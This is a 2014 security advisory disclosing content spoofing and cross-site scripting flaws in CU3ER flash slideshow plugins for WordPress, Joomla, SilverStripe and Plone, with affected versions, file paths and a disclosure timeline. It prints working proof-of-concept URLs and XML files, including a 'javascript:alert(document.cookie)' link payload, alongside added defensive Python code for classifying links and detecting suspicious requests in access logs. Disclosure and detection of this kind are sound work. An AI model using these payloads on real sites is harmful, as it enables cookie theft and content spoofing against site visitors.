SECURITYVULNS:DOC:30598
May 04, 2014 - 12:00 a.m.

Vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone


Hello 3APA3A!

Recently I disclosed vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244). This is a popular flash file, and Google's index contains up to a million web sites with it (inurl:cu3er.swf filetype:swf - Google now shows 994000 results).

There are many plugins for different CMSs that include CU3ER. These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone. The plugins are: wpCU3ER for WordPress, jCU3ER and Vinaora Cu3er 3D Slide-show for Joomla, cu3er-silverstripe-extension for SilverStripe, and collective.cu3er for Plone.


Affected products:

Vulnerable are all plugins with flash file of CU3ER.

Vulnerable are wpCU3ER 0.75 and previous versions.

Vulnerable are jCU3ER 0.12 and previous versions.

Vulnerable are Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1 and previous versions.

Vulnerable are all versions of cu3er-silverstripe-extension.

Vulnerable are collective.cu3er 0.1 and previous versions.


Affected vendors:

MADEBYPLAY (wpCU3ER and jCU3ER)
http://getcu3er.com

Vinaora
http://code.google.com/p/vinaora-3d-slideshow

Matt Clegg
http://www.silverstripe.org/cu3er-silverstripe-extension-module

Thomas Massmann
https://pypi.python.org/pypi/collective.cu3er/0.1


Details:

Path to flash-file in different plugins:

http://site/wp-content/uploads/wpcu3er/CU3ER.swf
In old versions of the plugin:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf

http://site/components/com_cu3er/flash/CU3ER.swf

http://site/media/mod_vinaora_cu3er/flash/cu3er.swf

http://site/cu3er-silverstripe-extension/flash/cu3er.swf

http://site/collective/cu3er/browser/flash/cu3er.swf

The first two plugins use the latest version of CU3ER; the other three use version 0.9.2 (as do old versions of wp-cu3er).

Content Spoofing (Content Injection) (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
  <slides>
    <slide>
      <url>1.jpg</url>
      <link>http://websecurity.com.ua</link>
    </slide>
  </slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
  <slides>
    <slide>
      <url>1.jpg</url>
      <link>javascript:alert(document.cookie)</link>
    </slide>
  </slides>
</cu3er>
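
A triage check for a configuration file like the ones above, as an added example that is not part of the original advisory: it lists every <link> value and marks script-capable schemes and off-site hosts. It walks all <link> elements, so it goes beyond the 0.9.2 layout and also covers the 1.24 layout; the function name, sample files and host names (site.example, other.example) are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

def classify_links(xml_text, trusted_hosts):
    """Return (link, verdict) for every <link> element in a CU3ER config.

    Walks all <link> elements, so it covers both layouts in the advisory:
    the <cu3er> root used by 0.9.2 and the <data> root used by 1.24.
    """
    findings = []
    for el in ET.fromstring(xml_text.strip()).iter("link"):
        raw = (el.text or "").strip()
        # Browsers drop tab/CR/LF inside a URL, so "java<TAB>script:" still runs.
        value = "".join(ch for ch in raw if ch not in "\t\r\n")
        parts = urlsplit(value)
        scheme = parts.scheme.lower()
        host = (parts.hostname or "").lower()
        if scheme not in ("", "http", "https"):
            verdict = "unsafe-scheme"   # e.g. javascript: -> XSS (WASC-08)
        elif host and host not in trusted_hosts:
            verdict = "offsite"         # content spoofing candidate (WASC-12)
        else:
            verdict = "ok"              # relative link or trusted host
        findings.append((raw, verdict))
    return findings

# Constructed samples modelled on the two file layouts shown in the advisory.
SAMPLE_092 = """<?xml version="1.0" encoding="UTF-8"?>
<cu3er><slides>
  <slide><url>1.jpg</url><link>javascript:alert(document.cookie)</link></slide>
  <slide><url>2.jpg</url><link>/gallery/1</link></slide>
  <slide><url>3.jpg</url><link>java\tscript:alert(1)</link></slide>
</slides></cu3er>"""

SAMPLE_124 = """<data>
  <defaults>
    <slide time="5"><link>http://other.example/landing</link></slide>
  </defaults>
  <slides><slide><url><![CDATA[1.jpg]]></url></slide></slides>
</data>"""

if __name__ == "__main__":
    for sample in (SAMPLE_092, SAMPLE_124):
        for link, verdict in classify_links(sample, {"site.example"}):
            print(f"{verdict:14} {link!r}")
```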

Cross-domain attacks require a crossdomain.xml file on the web site that hosts the xml-files.

These are examples of CS and XSS attacks on CU3ER version 0.9.2. The latest version, 1.24, needs different xml-files and a different parameter passed to the flash file.

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

File 1.xml:

<data>
  <project_settings>
    <width>800</width>
    <height>600</height>
  </project_settings>
  <settings>
    <folder_images>/</folder_images>
    <start_slide>1</start_slide>
    <auto_play>true</auto_play>
    <randomize_slides>false</randomize_slides>
    <pause_on_rollover>true</pause_on_rollover>
  </settings>
  <preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
  </preloader>
  <controls>
    <prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="15,0,0,15">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </prev_button>
    <next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="0,15,15,0">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
        <tweenOver tint="0xffffff" alpha="0.9"/>
        <tweenHide tint="0xffffff" alpha="0"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </next_button>
  </controls>
  <defaults>
    <slide time="5" color="0x000000">
      <image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
      <link>http://websecurity.com.ua</link>
    </slide>
  </defaults>
  <slides>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
    <transition rows="3" columns="5"/>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
  </slides>
</data>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

File xss.xml:

<data>
  <project_settings>
    <width>800</width>
    <height>600</height>
  </project_settings>
  <settings>
    <folder_images>/</folder_images>
    <start_slide>1</start_slide>
    <auto_play>true</auto_play>
    <randomize_slides>false</randomize_slides>
    <pause_on_rollover>true</pause_on_rollover>
  </settings>
  <preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
  </preloader>
  <controls>
    <prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="15,0,0,15">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </prev_button>
    <next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="0,15,15,0">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
        <tweenOver tint="0xffffff" alpha="0.9"/>
        <tweenHide tint="0xffffff" alpha="0"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </next_button>
  </controls>
  <defaults>
    <slide time="5" color="0x000000">
      <image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
      <link>javascript:alert(document.cookie)</link>
    </slide>
  </defaults>
  <slides>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
    <transition rows="3" columns="5"/>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
  </slides>
</data>
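
A detection sketch for the requests described in this section, as an added example that is not part of the original advisory: it scans combined-format access log lines for cu3er.swf requests whose xml or xml_location parameter points away from the site's own hosts. The function name, log lines, addresses and host names (site.example, site2.example) are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
CONFIG_PARAMS = ("xml", "xml_location")  # 0.9.2 and 1.24 names from the advisory

def suspicious_cu3er_requests(log_lines, own_hosts):
    """Return (client, param, value) for config URLs that leave own_hosts."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # File name case differs between plugins (CU3ER.swf / cu3er.swf).
        if not url.path.lower().endswith("/cu3er.swf"):
            continue
        params = parse_qs(url.query)  # also percent-decodes the values
        for name in CONFIG_PARAMS:
            for value in params.get(name, []):
                ref = urlsplit(value.strip())
                host = (ref.hostname or "").lower()
                offsite = bool(host) and host not in own_hosts
                odd_scheme = ref.scheme.lower() not in ("", "http", "https")
                if offsite or odd_scheme:
                    hits.append((client, name, value))
    return hits

# Constructed log lines; addresses and host names are documentation values.
_TS = "[04/May/2014:10:00:00 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {_TS} "GET /wp-content/uploads/wpcu3er/CU3ER.swf'
    '?xml_location=http://site2.example/1.xml HTTP/1.1" 200 5120',
    f'198.51.100.9 - - {_TS} "GET /media/mod_vinaora_cu3er/flash/cu3er.swf'
    '?xml=http%3A%2F%2Fsite2.example%2Fxss.xml HTTP/1.1" 200 5120',
    f'192.0.2.4 - - {_TS} "GET /components/com_cu3er/flash/CU3ER.swf'
    '?xml_location=/images/cu3er/config.xml HTTP/1.1" 200 5120',
    f'192.0.2.4 - - {_TS} "GET /collective/cu3er/browser/flash/cu3er.swf'
    '?xml=http://site.example/config.xml HTTP/1.1" 200 5120',
    f'192.0.2.8 - - {_TS} "GET /index.php?xml=http://site2.example/1.xml HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in suspicious_cu3er_requests(SAMPLE_LOG, {"site.example"}):
        print(hit)
```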


Timeline:

2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins. Later informed developers of the plugins.
2014.04.18 - disclosed at my site (http://websecurity.com.ua/6893/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua